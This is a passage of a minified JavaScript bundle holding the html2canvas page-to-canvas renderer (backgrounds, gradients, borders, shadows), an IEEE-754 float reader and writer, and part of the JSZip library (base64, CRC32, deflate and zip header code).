dt=Ml(je)?je.start:je;0===tt?_e.ctx.moveTo(dt.x,dt.y):_e.ctx.lineTo(dt.x,dt.y),Ml(je)&&_e.ctx.bezierCurveTo(je.startControl.x,je.startControl.y,je.endControl.x,je.endControl.y,je.end.x,je.end.y)})},ce.prototype.renderRepeat=function(ge,_e,je,tt){this.path(ge),this.ctx.fillStyle=_e,this.ctx.translate(je,tt),this.ctx.fill(),this.ctx.translate(-je,-tt)},ce.prototype.resizeImage=function(ge,_e,je){var tt;if(ge.width===_e&&ge.height===je)return ge;var _t=(null!==(tt=this.canvas.ownerDocument)&&void 0!==tt?tt:document).createElement("canvas");return _t.width=Math.max(1,_e),_t.height=Math.max(1,je),_t.getContext("2d").drawImage(ge,0,0,ge.width,ge.height,0,0,_e,je),_t},ce.prototype.renderBackgroundImage=function(ge){return j(this,void 0,void 0,function(){var _e,je,tt,dt,_t;return $(this,function(kt){switch(kt.label){case 0:_e=ge.styles.backgroundImage.length-1,je=function(Lt){var Ht,ui,Ki,Ni,Ui,dn,ta,na,To,Mn,qa,Qi,ro,Yn,Ka,Sr,Uc,qc,On,Ps,Gc,mi,yc,$f,qs,wr,_h,gh,nc,Ch,Ul;return $(this,function(Kf){switch(Kf.label){case 0:if(0!==Lt.type)return[3,5];Ht=void 0,ui=Lt.url,Kf.label=1;case 1:return Kf.trys.push([1,3,,4]),[4,tt.context.cache.match(ui)];case 2:return Ht=Kf.sent(),[3,4];case 3:return Kf.sent(),tt.context.logger.error("Error loading background-image "+ui),[3,4];case 4:return Ht&&(Ki=j_(ge,_e,[Ht.width,Ht.height,Ht.width/Ht.height]),Sr=Ki[0],mi=Ki[1],yc=Ki[2],Yn=tt.ctx.createPattern(tt.resizeImage(Ht,On=Ki[3],Ps=Ki[4]),"repeat"),tt.renderRepeat(Sr,Yn,mi,yc)),[3,6];case 5:!function(fe){return 1===fe.type}(Lt)?function(fe){return 2===fe.type}(Lt)&&(Ka=j_(ge,_e,[null,null,null]),Sr=Ka[0],Uc=Ka[1],qc=Ka[2],Ps=Ka[4],mi=_n((Gc=0===Lt.position.length?[Vi]:Lt.position)[0],On=Ka[3]),yc=_n(Gc[Gc.length-1],Ps),$f=function(fe,ce,ge,_e,je){var tt=0,dt=0;switch(fe.size){case 0:0===fe.shape?tt=dt=Math.min(Math.abs(ce),Math.abs(ce-_e),Math.abs(ge),Math.abs(ge-je)):1===fe.shape&&(tt=Math.min(Math.abs(ce),Math.abs(ce-_e)),dt=Math.min(Math.abs(ge),Math.abs(ge-je)));break;case 2:if(0===fe.shape)tt=dt=Math.min(gr(ce,ge),gr(ce,ge-je),gr(ce-_e,ge),gr(ce-_e,ge-je));else if(1===fe.shape){var _t=Math.min(Math.abs(ge),Math.abs(ge-je))/Math.min(Math.abs(ce),Math.abs(ce-_e)),gt=s0(_e,je,ce,ge,!0);dt=_t*(tt=gr(gt[0]-ce,(gt[1]-ge)/_t))}break;case 1:0===fe.shape?tt=dt=Math.max(Math.abs(ce),Math.abs(ce-_e),Math.abs(ge),Math.abs(ge-je)):1===fe.shape&&(tt=Math.max(Math.abs(ce),Math.abs(ce-_e)),dt=Math.max(Math.abs(ge),Math.abs(ge-je)));break;case 3:if(0===fe.shape)tt=dt=Math.max(gr(ce,ge),gr(ce,ge-je),gr(ce-_e,ge),gr(ce-_e,ge-je));else if(1===fe.shape){_t=Math.max(Math.abs(ge),Math.abs(ge-je))/Math.max(Math.abs(ce),Math.abs(ce-_e));var Ht=s0(_e,je,ce,ge,!1);dt=_t*(tt=gr(Ht[0]-ce,(Ht[1]-ge)/_t))}}return Array.isArray(fe.size)&&(tt=_n(fe.size[0],_e),dt=2===fe.size.length?_n(fe.size[1],je):tt),[tt,dt]}(Lt,mi,yc,On,Ps),wr=$f[1],(qs=$f[0])>0&&wr>0&&(_h=tt.ctx.createRadialGradient(Uc+mi,qc+yc,0,Uc+mi,qc+yc,qs),Gu(Lt.stops,2*qs).forEach(function($_){return _h.addColorStop($_.stop,er($_.color))}),tt.path(Sr),tt.ctx.fillStyle=_h,qs!==wr?(gh=ge.bounds.left+.5*ge.bounds.width,nc=ge.bounds.top+.5*ge.bounds.height,Ul=1/(Ch=wr/qs),tt.ctx.save(),tt.ctx.translate(gh,nc),tt.ctx.transform(1,0,0,Ch,0,0),tt.ctx.translate(-gh,-nc),tt.ctx.fillRect(Uc,Ul*(qc-nc)+nc,On,Ps*Ul),tt.ctx.restore()):tt.ctx.fill())):(Ni=j_(ge,_e,[null,null,null]),Sr=Ni[0],mi=Ni[1],yc=Ni[2],Ui=uc(Lt.angle,On=Ni[3],Ps=Ni[4]),dn=Ui[0],ta=Ui[1],na=Ui[2],To=Ui[3],Mn=Ui[4],(qa=document.createElement("canvas")).width=On,qa.height=Ps,Qi=qa.getContext("2d"),ro=Qi.createLinearGradient(ta,To,na,Mn),Gu(Lt.stops,dn).forEach(function($_){return ro.addColorStop($_.stop,er($_.color))}),Qi.fillStyle=ro,Qi.fillRect(0,0,On,Ps),On>0&&Ps>0&&(Yn=tt.ctx.createPattern(qa,"repeat"),tt.renderRepeat(Sr,Yn,mi,yc))),Kf.label=6;case 6:return _e--,[2]}})},tt=this,dt=0,_t=ge.styles.backgroundImage.slice(0).reverse(),kt.label=1;case 1:return dt<_t.length?[5,je(_t[dt])]:[3,4];case 2:kt.sent(),kt.label=3;case 3:return dt++,[3,1];case 4:return[2]}})})},ce.prototype.renderSolidBorder=function(ge,_e,je){return j(this,void 0,void 0,function(){return $(this,function(tt){return this.path(hE(je,_e)),this.ctx.fillStyle=er(ge),this.ctx.fill(),[2]})})},ce.prototype.renderDoubleBorder=function(ge,_e,je,tt){return j(this,void 0,void 0,function(){var dt,_t;return $(this,function(gt){switch(gt.label){case 0:return _e<3?[4,this.renderSolidBorder(ge,je,tt)]:[3,2];case 1:return gt.sent(),[2];case 2:return dt=function(fe,ce){switch(ce){case 0:return vl(fe.topLeftBorderBox,fe.topLeftBorderDoubleOuterBox,fe.topRightBorderBox,fe.topRightBorderDoubleOuterBox);case 1:return vl(fe.topRightBorderBox,fe.topRightBorderDoubleOuterBox,fe.bottomRightBorderBox,fe.bottomRightBorderDoubleOuterBox);case 2:return vl(fe.bottomRightBorderBox,fe.bottomRightBorderDoubleOuterBox,fe.bottomLeftBorderBox,fe.bottomLeftBorderDoubleOuterBox);default:return vl(fe.bottomLeftBorderBox,fe.bottomLeftBorderDoubleOuterBox,fe.topLeftBorderBox,fe.topLeftBorderDoubleOuterBox)}}(tt,je),this.path(dt),this.ctx.fillStyle=er(ge),this.ctx.fill(),_t=function(fe,ce){switch(ce){case 0:return vl(fe.topLeftBorderDoubleInnerBox,fe.topLeftPaddingBox,fe.topRightBorderDoubleInnerBox,fe.topRightPaddingBox);case 1:return vl(fe.topRightBorderDoubleInnerBox,fe.topRightPaddingBox,fe.bottomRightBorderDoubleInnerBox,fe.bottomRightPaddingBox);case 2:return vl(fe.bottomRightBorderDoubleInnerBox,fe.bottomRightPaddingBox,fe.bottomLeftBorderDoubleInnerBox,fe.bottomLeftPaddingBox);default:return vl(fe.bottomLeftBorderDoubleInnerBox,fe.bottomLeftPaddingBox,fe.topLeftBorderDoubleInnerBox,fe.topLeftPaddingBox)}}(tt,je),this.path(_t),this.ctx.fill(),[2]}})})},ce.prototype.renderNodeBackgroundAndBorders=function(ge){return j(this,void 0,void 0,function(){var _e,je,tt,dt,_t,gt,kt,Lt,Ht=this;return $(this,function(ui){switch(ui.label){case 0:return this.applyEffects(ge.getEffects(2)),je=!Pc((_e=ge.container.styles).backgroundColor)||_e.backgroundImage.length,tt=[{style:_e.borderTopStyle,color:_e.borderTopColor,width:_e.borderTopWidth},{style:_e.borderRightStyle,color:_e.borderRightColor,width:_e.borderRightWidth},{style:_e.borderBottomStyle,color:_e.borderBottomColor,width:_e.borderBottomWidth},{style:_e.borderLeftStyle,color:_e.borderLeftColor,width:_e.borderLeftWidth}],dt=B7(Qf(_e.backgroundClip,0),ge.curves),je||_e.boxShadow.length?(this.ctx.save(),this.path(dt),this.ctx.clip(),Pc(_e.backgroundColor)||(this.ctx.fillStyle=er(_e.backgroundColor),this.ctx.fill()),[4,this.renderBackgroundImage(ge.container)]):[3,2];case 1:ui.sent(),this.ctx.restore(),_e.boxShadow.slice(0).reverse().forEach(function(Ki){Ht.ctx.save();var Ni=q_(ge.curves),Ui=Ki.inset?0:1e4,dn=function(fe,ce,ge,_e,je){return fe.map(function(tt,dt){switch(dt){case 0:return tt.add(ce,ge);case 1:return tt.add(ce+_e,ge);case 2:return tt.add(ce+_e,ge+je);case 3:return tt.add(ce,ge+je)}return tt})}(Ni,(Ki.inset?1:-1)*Ki.spread.number-Ui,(Ki.inset?1:-1)*Ki.spread.number,Ki.spread.number*(Ki.inset?-2:2),Ki.spread.number*(Ki.inset?-2:2));Ki.inset?(Ht.path(Ni),Ht.ctx.clip(),Ht.mask(dn)):(Ht.mask(Ni),Ht.ctx.clip(),Ht.path(dn)),Ht.ctx.shadowOffsetX=Ki.offsetX.number+Ui,Ht.ctx.shadowOffsetY=Ki.offsetY.number,Ht.ctx.shadowColor=er(Ki.color),Ht.ctx.shadowBlur=Ki.blur.number,Ht.ctx.fillStyle=Ki.inset?er(Ki.color):"rgba(0,0,0,1)",Ht.ctx.fill(),Ht.ctx.restore()}),ui.label=2;case 2:_t=0,gt=0,kt=tt,ui.label=3;case 3:return gt<kt.length?0!==(Lt=kt[gt]).style&&!Pc(Lt.color)&&Lt.width>0?2!==Lt.style?[3,5]:[4,this.renderDashedDottedBorder(Lt.color,Lt.width,_t,ge.curves,2)]:[3,11]:[3,13];case 4:return ui.sent(),[3,11];case 5:return 3!==Lt.style?[3,7]:[4,this.renderDashedDottedBorder(Lt.color,Lt.width,_t,ge.curves,3)];case 6:return ui.sent(),[3,11];case 7:return 4!==Lt.style?[3,9]:[4,this.renderDoubleBorder(Lt.color,Lt.width,_t,ge.curves)];case 8:return ui.sent(),[3,11];case 9:return[4,this.renderSolidBorder(Lt.color,_t,ge.curves)];case 10:ui.sent(),ui.label=11;case 11:_t++,ui.label=12;case 12:return gt++,[3,3];case 13:return[2]}})})},ce.prototype.renderDashedDottedBorder=function(ge,_e,je,tt,dt){return j(this,void 0,void 0,function(){var _t,gt,kt,Lt,Ht,ui,Ki,Ni,Ui,dn,ta,na,To,Mn,qa,Qi;return $(this,function(ro){return this.ctx.save(),_t=function(fe,ce){switch(ce){case 0:return U0(fe.topLeftBorderStroke,fe.topRightBorderStroke);case 1:return U0(fe.topRightBorderStroke,fe.bottomRightBorderStroke);case 2:return U0(fe.bottomRightBorderStroke,fe.bottomLeftBorderStroke);default:return U0(fe.bottomLeftBorderStroke,fe.topLeftBorderStroke)}}(tt,je),gt=hE(tt,je),2===dt&&(this.path(gt),this.ctx.clip()),Ml(gt[0])?(kt=gt[0].start.x,Lt=gt[0].start.y):(kt=gt[0].x,Lt=gt[0].y),Ml(gt[1])?(Ht=gt[1].end.x,ui=gt[1].end.y):(Ht=gt[1].x,ui=gt[1].y),Ki=0===je||2===je?Math.abs(kt-Ht):Math.abs(Lt-ui),this.ctx.beginPath(),this.formatPath(3===dt?_t:gt.slice(0,2)),Ni=_e<3?3*_e:2*_e,Ui=_e<3?2*_e:_e,3===dt&&(Ni=_e,Ui=_e),dn=!0,Ki<=2*Ni?dn=!1:Ki<=2*Ni+Ui?(Ni*=ta=Ki/(2*Ni+Ui),Ui*=ta):(na=Math.floor((Ki+Ui)/(Ni+Ui)),To=(Ki-na*Ni)/(na-1),Ui=(Mn=(Ki-(na+1)*Ni)/na)<=0||Math.abs(Ui-To)<Math.abs(Ui-Mn)?To:Mn),dn&&this.ctx.setLineDash(3===dt?[0,Ni+Ui]:[Ni,Ui]),3===dt?(this.ctx.lineCap="round",this.ctx.lineWidth=_e):this.ctx.lineWidth=2*_e+1.1,this.ctx.strokeStyle=er(ge),this.ctx.stroke(),this.ctx.setLineDash([]),2===dt&&(Ml(gt[0])&&(qa=gt[3],Qi=gt[0],this.ctx.beginPath(),this.formatPath([new Fi(qa.end.x,qa.end.y),new Fi(Qi.start.x,Qi.start.y)]),this.ctx.stroke()),Ml(gt[1])&&(qa=gt[1],Qi=gt[2],this.ctx.beginPath(),this.formatPath([new Fi(qa.end.x,qa.end.y),new Fi(Qi.start.x,Qi.start.y)]),this.ctx.stroke())),this.ctx.restore(),[2]})})},ce.prototype.render=function(ge){return j(this,void 0,void 0,function(){var _e;return $(this,function(je){switch(je.label){case 0:return this.options.backgroundColor&&(this.ctx.fillStyle=er(this.options.backgroundColor),this.ctx.fillRect(this.options.x,this.options.y,this.options.width,this.options.height)),_e=function(fe){var ce=new uE(fe,null),ge=new mE(ce),_e=[];return ZM(ce,ge,ge,_e),H0(ce.container,_e),ge}(ge),[4,this.renderStack(_e)];case 1:return je.sent(),this.applyEffects([]),[2,this.canvas]}})})},ce}(nv),V7=function(fe){return fe instanceof N0||fe instanceof hd||fe instanceof z_&&fe.type!==ps&&fe.type!==sh},B7=function(fe,ce){switch(fe){case 0:return q_(ce);case 2:return function(fe){return[fe.topLeftContentBox,fe.topRightContentBox,fe.bottomRightContentBox,fe.bottomLeftContentBox]}(ce);default:return F0(ce)}},Q_=function(fe){switch(fe){case 1:return"center";case 2:return"right";default:return"left"}},OC=["-apple-system","system-ui"],ov=function(fe){return/iPhone OS 15_(0|1)/.test(window.navigator.userAgent)?fe.filter(function(ce){return-1===OC.indexOf(ce)}):fe},rv=function(fe){function ce(ge,_e){var je=fe.call(this,ge,_e)||this;return je.canvas=_e.canvas?_e.canvas:document.createElement("canvas"),je.ctx=je.canvas.getContext("2d"),je.options=_e,je.canvas.width=Math.floor(_e.width*_e.scale),je.canvas.height=Math.floor(_e.height*_e.scale),je.canvas.style.width=_e.width+"px",je.canvas.style.height=_e.height+"px",je.ctx.scale(je.options.scale,je.options.scale),je.ctx.translate(-_e.x,-_e.y),je.context.logger.debug("EXPERIMENTAL ForeignObject renderer initialized ("+_e.width+"x"+_e.height+" at "+_e.x+","+_e.y+") with scale "+_e.scale),je}return de(ce,fe),ce.prototype.render=function(ge){return j(this,void 0,void 0,function(){var _e,je;return $(this,function(tt){switch(tt.label){case 0:return _e=O0(this.options.width*this.options.scale,this.options.height*this.options.scale,this.options.scale,this.options.scale,ge),[4,sv(_e)];case 1:return je=tt.sent(),this.options.backgroundColor&&(this.ctx.fillStyle=er(this.options.backgroundColor),this.ctx.fillRect(0,0,this.options.width*this.options.scale,this.options.height*this.options.scale)),this.ctx.drawImage(je,-this.options.x*this.options.scale,-this.options.y*this.options.scale),[2,this.canvas]}})})},ce}(nv),sv=function(fe){return new Promise(function(ce,ge){var _e=new Image;_e.onload=function(){ce(_e)},_e.onerror=ge,_e.src="data:image/svg+xml;charset=utf-8,"+encodeURIComponent((new XMLSerializer).serializeToString(fe))})},CE=function(){function fe(ce){var _e=ce.enabled;this.id=ce.id,this.enabled=_e,this.start=Date.now()}return fe.prototype.debug=function(){for(var ce=[],ge=0;ge<arguments.length;ge++)ce[ge]=arguments[ge];this.enabled&&("undefined"!=typeof window&&window.console&&"function"==typeof console.debug?console.debug.apply(console,ae([this.id,this.getTime()+"ms"],ce)):this.info.apply(this,ce))},fe.prototype.getTime=function(){return Date.now()-this.start},fe.prototype.info=function(){for(var ce=[],ge=0;ge<arguments.length;ge++)ce[ge]=arguments[ge];this.enabled&&"undefined"!=typeof window&&window.console&&"function"==typeof console.info&&console.info.apply(console,ae([this.id,this.getTime()+"ms"],ce))},fe.prototype.warn=function(){for(var ce=[],ge=0;ge<arguments.length;ge++)ce[ge]=arguments[ge];this.enabled&&("undefined"!=typeof window&&window.console&&"function"==typeof console.warn?console.warn.apply(console,ae([this.id,this.getTime()+"ms"],ce)):this.info.apply(this,ce))},fe.prototype.error=function(){for(var ce=[],ge=0;ge<arguments.length;ge++)ce[ge]=arguments[ge];this.enabled&&("undefined"!=typeof window&&window.console&&"function"==typeof console.error?console.error.apply(console,ae([this.id,this.getTime()+"ms"],ce)):this.info.apply(this,ce))},fe.instances={},fe}(),cv=function(){function fe(ce,ge){var _e;this.windowBounds=ge,this.instanceName="#"+fe.instanceCount++,this.logger=new CE({id:this.instanceName,enabled:ce.logging}),this.cache=null!==(_e=ce.cache)&&void 0!==_e?_e:new KM(this,ce)}return fe.instanceCount=1,fe}();"undefined"!=typeof window&&wC.setContext(window);var NC=function(fe,ce){return j(void 0,void 0,void 0,function(){var ge,_e,je,tt,dt,_t,gt,kt,Lt,Ht,ui,Ki,Ni,Ui,dn,ta,na,To,Mn,qa,Qi,Yn,Ka,Sr,Uc,qc,On,Ps,Gc,mi,yc,$f,qs,wr,_h,gh,nc,Ch;return $(this,function(Ul){switch(Ul.label){case 0:if(!fe||"object"!=typeof fe)return[2,Promise.reject("Invalid element provided as first argument")];if(!(ge=fe.ownerDocument))throw new Error("Element is not attached to a Document");if(!(_e=ge.defaultView))throw new Error("Document is not attached to a Window");return je={allowTaint:null!==(Yn=ce.allowTaint)&&void 0!==Yn&&Yn,imageTimeout:null!==(Ka=ce.imageTimeout)&&void 0!==Ka?Ka:15e3,proxy:ce.proxy,useCORS:null!==(Sr=ce.useCORS)&&void 0!==Sr&&Sr},tt=ie({logging:null===(Uc=ce.logging)||void 0===Uc||Uc,cache:ce.cache},je),dt={windowWidth:null!==(qc=ce.windowWidth)&&void 0!==qc?qc:_e.innerWidth,windowHeight:null!==(On=ce.windowHeight)&&void 0!==On?On:_e.innerHeight,scrollX:null!==(Ps=ce.scrollX)&&void 0!==Ps?Ps:_e.pageXOffset,scrollY:null!==(Gc=ce.scrollY)&&void 0!==Gc?Gc:_e.pageYOffset},_t=new I(dt.scrollX,dt.scrollY,dt.windowWidth,dt.windowHeight),gt=new cv(tt,_t),kt=null!==(mi=ce.foreignObjectRendering)&&void 0!==mi&&mi,Lt={allowTaint:null!==(yc=ce.allowTaint)&&void 0!==yc&&yc,onclone:ce.onclone,ignoreElements:ce.ignoreElements,inlineImages:kt,copyStyles:kt},gt.logger.debug("Starting document clone with size "+_t.width+"x"+_t.height+" scrolled to "+-_t.left+","+-_t.top),Ht=new H_(gt,fe,Lt),(ui=Ht.clonedReferenceElement)?[4,Ht.toIFrame(ge,_t)]:[2,Promise.reject("Unable to find element in cloned iframe")];case 1:return Ki=Ul.sent(),Ni=rr(ui)||function(fe){return"HTML"===fe.tagName}(ui)?function(fe){var ce=fe.body,ge=fe.documentElement;if(!ce||!ge)throw new Error("Unable to get document size");var _e=Math.max(Math.max(ce.scrollWidth,ge.scrollWidth),Math.max(ce.offsetWidth,ge.offsetWidth),Math.max(ce.clientWidth,ge.clientWidth)),je=Math.max(Math.max(ce.scrollHeight,ge.scrollHeight),Math.max(ce.offsetHeight,ge.offsetHeight),Math.max(ce.clientHeight,ge.clientHeight));return new I(0,0,_e,je)}(ui.ownerDocument):Q(gt,ui),Ui=Ni.width,dn=Ni.height,ta=Ni.left,na=Ni.top,To=H7(gt,ui,ce.backgroundColor),Mn={canvas:ce.canvas,backgroundColor:To,scale:null!==(qs=null!==($f=ce.scale)&&void 0!==$f?$f:_e.devicePixelRatio)&&void 0!==qs?qs:1,x:(null!==(wr=ce.x)&&void 0!==wr?wr:0)+ta,y:(null!==(_h=ce.y)&&void 0!==_h?_h:0)+na,width:null!==(gh=ce.width)&&void 0!==gh?gh:Math.ceil(Ui),height:null!==(nc=ce.height)&&void 0!==nc?nc:Math.ceil(dn)},kt?(gt.logger.debug("Document cloned, using foreign object rendering"),[4,new rv(gt,Mn).render(ui)]):[3,3];case 2:return qa=Ul.sent(),[3,5];case 3:return gt.logger.debug("Document cloned, element located at "+ta+","+na+" with size "+Ui+"x"+dn+" using computed rendering"),gt.logger.debug("Starting DOM parsing"),Qi=Ce(gt,ui),To===Qi.styles.backgroundColor&&(Qi.styles.backgroundColor=Oc.TRANSPARENT),gt.logger.debug("Starting renderer for element at "+Mn.x+","+Mn.y+" with size "+Mn.width+"x"+Mn.height),[4,new gE(gt,Mn).render(Qi)];case 4:qa=Ul.sent(),Ul.label=5;case 5:return(!(null!==(Ch=ce.removeContainer)&&void 0!==Ch)||Ch)&&(H_.destroy(Ki)||gt.logger.error("Cannot detach cloned iframe as it is not in the DOM anymore")),gt.logger.debug("Finished rendering"),[2,qa]}})})},H7=function(fe,ce,ge){var _e=ce.ownerDocument,je=_e.documentElement?uo(fe,getComputedStyle(_e.documentElement).backgroundColor):Oc.TRANSPARENT,tt=_e.body?uo(fe,getComputedStyle(_e.body).backgroundColor):Oc.TRANSPARENT,dt="string"==typeof ge?uo(fe,ge):null===ge?Oc.TRANSPARENT:4294967295;return ce===_e.documentElement?Pc(je)?Pc(tt)?dt:tt:je:dt};return function(fe,ce){return void 0===ce&&(ce={}),NC(fe,ce)}}()},4794:(Pe,we)=>{we.read=function(de,ie,j,$,ae){var I,Q,F=8*ae-$-1,E=(1<<F)-1,g=E>>1,b=-7,_=j?ae-1:0,y=j?-1:1,M=de[ie+_];for(_+=y,I=M&(1<<-b)-1,M>>=-b,b+=F;b>0;I=256*I+de[ie+_],_+=y,b-=8);for(Q=I&(1<<-b)-1,I>>=-b,b+=$;b>0;Q=256*Q+de[ie+_],_+=y,b-=8);if(0===I)I=1-g;else{if(I===E)return Q?NaN:1/0*(M?-1:1);Q+=Math.pow(2,$),I-=g}return(M?-1:1)*Q*Math.pow(2,I-$)},we.write=function(de,ie,j,$,ae,I){var Q,F,E,g=8*I-ae-1,b=(1<<g)-1,_=b>>1,y=23===ae?Math.pow(2,-24)-Math.pow(2,-77):0,M=$?0:I-1,p=$?1:-1,D=ie<0||0===ie&&1/ie<0?1:0;for(ie=Math.abs(ie),isNaN(ie)||ie===1/0?(F=isNaN(ie)?1:0,Q=b):(Q=Math.floor(Math.log(ie)/Math.LN2),ie*(E=Math.pow(2,-Q))<1&&(Q--,E*=2),(ie+=Q+_>=1?y/E:y*Math.pow(2,1-_))*E>=2&&(Q++,E/=2),Q+_>=b?(F=0,Q=b):Q+_>=1?(F=(ie*E-1)*Math.pow(2,ae),Q+=_):(F=ie*Math.pow(2,_-1)*Math.pow(2,ae),Q=0));ae>=8;de[j+M]=255&F,M+=p,F/=256,ae-=8);for(Q=Q<<ae|F,g+=ae;g>0;de[j+M]=255&Q,M+=p,Q/=256,g-=8);de[j+M-p]|=128*D}},2270:Pe=>{Pe.exports="function"==typeof Object.create?function(de,ie){ie&&(de.super_=ie,de.prototype=Object.create(ie.prototype,{constructor:{value:de,enumerable:!1,writable:!0,configurable:!0}}))}:function(de,ie){if(ie){de.super_=ie;var j=function(){};j.prototype=ie.prototype,de.prototype=new j,de.prototype.constructor=de}}},7729:Pe=>{"use strict";Pe.exports=function(de){return null!=de&&"object"==typeof de&&!1===Array.isArray(de)}},7040:(Pe,we,de)=>{var ie=de(5449).Buffer,j=de(5486);Pe.exports=function $(ae,I,Q){function F(b,_){if(!I[b]){if(!ae[b]){if(E)return E(b,!0);var M=new Error("Cannot find module '"+b+"'");throw M.code="MODULE_NOT_FOUND",M}var p=I[b]={exports:{}};ae[b][0].call(p.exports,function(D){return F(ae[b][1][D]||D)},p,p.exports,$,ae,I,Q)}return I[b].exports}for(var E=void 0,g=0;g<Q.length;g++)F(Q[g]);return F}({1:[function($,ae,I){"use strict";var Q=$("./utils"),F=$("./support"),E="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";I.encode=function(g){for(var b,_,y,p,D,w,x=[],S=0,O=g.length,U=O,K="string"!==Q.getTypeOf(g);S<g.length;)U=O-S,y=K?(b=g[S++],_=S<O?g[S++]:0,S<O?g[S++]:0):(b=g.charCodeAt(S++),_=S<O?g.charCodeAt(S++):0,S<O?g.charCodeAt(S++):0),p=(3&b)<<4|_>>4,D=1<U?(15&_)<<2|y>>6:64,w=2<U?63&y:64,x.push(E.charAt(b>>2)+E.charAt(p)+E.charAt(D)+E.charAt(w));return x.join("")},I.decode=function(g){var b,_,y,M,p,D,w=0,x=0,S="data:";if(g.substr(0,S.length)===S)throw new Error("Invalid base64 input, it looks like a data url.");var O,U=3*(g=g.replace(/[^A-Za-z0-9+/=]/g,"")).length/4;if(g.charAt(g.length-1)===E.charAt(64)&&U--,g.charAt(g.length-2)===E.charAt(64)&&U--,U%1!=0)throw new Error("Invalid base64 input, bad content length.");for(O=F.uint8array?new Uint8Array(0|U):new Array(0|U);w<g.length;)b=E.indexOf(g.charAt(w++))<<2|(M=E.indexOf(g.charAt(w++)))>>4,_=(15&M)<<4|(p=E.indexOf(g.charAt(w++)))>>2,y=(3&p)<<6|(D=E.indexOf(g.charAt(w++))),O[x++]=b,64!==p&&(O[x++]=_),64!==D&&(O[x++]=y);return O}},{"./support":30,"./utils":32}],2:[function($,ae,I){"use strict";var Q=$("./external"),F=$("./stream/DataWorker"),E=$("./stream/Crc32Probe"),g=$("./stream/DataLengthProbe");function b(_,y,M,p,D){this.compressedSize=_,this.uncompressedSize=y,this.crc32=M,this.compression=p,this.compressedContent=D}b.prototype={getContentWorker:function(){var _=new F(Q.Promise.resolve(this.compressedContent)).pipe(this.compression.uncompressWorker()).pipe(new g("data_length")),y=this;return _.on("end",function(){if(this.streamInfo.data_length!==y.uncompressedSize)throw new Error("Bug : uncompressed data size mismatch")}),_},getCompressedWorker:function(){return new F(Q.Promise.resolve(this.compressedContent)).withStreamInfo("compressedSize",this.compressedSize).withStreamInfo("uncompressedSize",this.uncompressedSize).withStreamInfo("crc32",this.crc32).withStreamInfo("compression",this.compression)}},b.createWorkerFrom=function(_,y,M){return _.pipe(new E).pipe(new g("uncompressedSize")).pipe(y.compressWorker(M)).pipe(new g("compressedSize")).withStreamInfo("compression",y)},ae.exports=b},{"./external":6,"./stream/Crc32Probe":25,"./stream/DataLengthProbe":26,"./stream/DataWorker":27}],3:[function($,ae,I){"use strict";var Q=$("./stream/GenericWorker");I.STORE={magic:"\0\0",compressWorker:function(){return new Q("STORE compression")},uncompressWorker:function(){return new Q("STORE decompression")}},I.DEFLATE=$("./flate")},{"./flate":7,"./stream/GenericWorker":28}],4:[function($,ae,I){"use strict";var Q=$("./utils"),F=function(){for(var E,g=[],b=0;b<256;b++){E=b;for(var _=0;_<8;_++)E=1&E?3988292384^E>>>1:E>>>1;g[b]=E}return g}();ae.exports=function(E,g){return void 0!==E&&E.length?"string"!==Q.getTypeOf(E)?function(b,_,y,M){var p=F,D=0+y;b^=-1;for(var w=0;w<D;w++)b=b>>>8^p[255&(b^_[w])];return-1^b}(0|g,E,E.length):function(b,_,y,M){var p=F,D=0+y;b^=-1;for(var w=0;w<D;w++)b=b>>>8^p[255&(b^_.charCodeAt(w))];return-1^b}(0|g,E,E.length):0}},{"./utils":32}],5:[function($,ae,I){"use strict";I.base64=!1,I.binary=!1,I.dir=!1,I.createFolders=!0,I.date=null,I.compression=null,I.compressionOptions=null,I.comment=null,I.unixPermissions=null,I.dosPermissions=null},{}],6:[function($,ae,I){"use strict";var Q;Q="undefined"!=typeof Promise?Promise:$("lie"),ae.exports={Promise:Q}},{lie:37}],7:[function($,ae,I){"use strict";var Q="undefined"!=typeof Uint8Array&&"undefined"!=typeof Uint16Array&&"undefined"!=typeof Uint32Array,F=$("pako"),E=$("./utils"),g=$("./stream/GenericWorker"),b=Q?"uint8array":"array";function _(y,M){g.call(this,"FlateWorker/"+y),this._pako=null,this._pakoAction=y,this._pakoOptions=M,this.meta={}}I.magic="\b\0",E.inherits(_,g),_.prototype.processChunk=function(y){this.meta=y.meta,null===this._pako&&this._createPako(),this._pako.push(E.transformTo(b,y.data),!1)},_.prototype.flush=function(){g.prototype.flush.call(this),null===this._pako&&this._createPako(),this._pako.push([],!0)},_.prototype.cleanUp=function(){g.prototype.cleanUp.call(this),this._pako=null},_.prototype._createPako=function(){this._pako=new F[this._pakoAction]({raw:!0,level:this._pakoOptions.level||-1});var y=this;this._pako.onData=function(M){y.push({data:M,meta:y.meta})}},I.compressWorker=function(y){return new _("Deflate",y)},I.uncompressWorker=function(){return new _("Inflate",{})}},{"./stream/GenericWorker":28,"./utils":32,pako:38}],8:[function($,ae,I){"use strict";function Q(p,D){var w,x="";for(w=0;w<D;w++)x+=String.fromCharCode(255&p),p>>>=8;return x}function F(p,D,w,x,S,O){var U,K,ee=p.file,se=p.compression,ve=O!==b.utf8encode,le=E.transformTo("string",O(ee.name)),ye=E.transformTo("string",b.utf8encode(ee.name)),z=ee.comment,l=E.transformTo("string",O(z)),f=E.transformTo("string",b.utf8encode(z)),A=ye.length!==ee.name.length,v=f.length!==z.length,P="",G="",X="",L=ee.dir,h=ee.date,R={crc32:0,compressedSize:0,uncompressedSize:0};D&&!w||(R.crc32=p.crc32,R.compressedSize=p.compressedSize,R.uncompressedSize=p.uncompressedSize);var J=0;D&&(J|=8),ve||!A&&!v||(J|=2048);var Ae,Xe,Z=0,ue=0;L&&(Z|=16),"UNIX"===S?(ue=798,Z|=(Xe=Ae=ee.unixPermissions,Ae||(Xe=L?16893:33204),(65535&Xe)<<16)):(ue=20,Z|=function(Ae){return 63&(Ae||0)}(ee.dosPermissions)),U=h.getUTCHours(),U<<=6,U|=h.getUTCMinutes(),U<<=5,U|=h.getUTCSeconds()/2,K=h.getUTCFullYear()-1980,K<<=4,K|=h.getUTCMonth()+1,K<<=5,K|=h.getUTCDate(),A&&(G=Q(1,1)+Q(_(le),4)+ye,P+="up"+Q(G.length,2)+G),v&&(X=Q(1,1)+Q(_(l),4)+f,P+="uc"+Q(X.length,2)+X);var Ie="";return 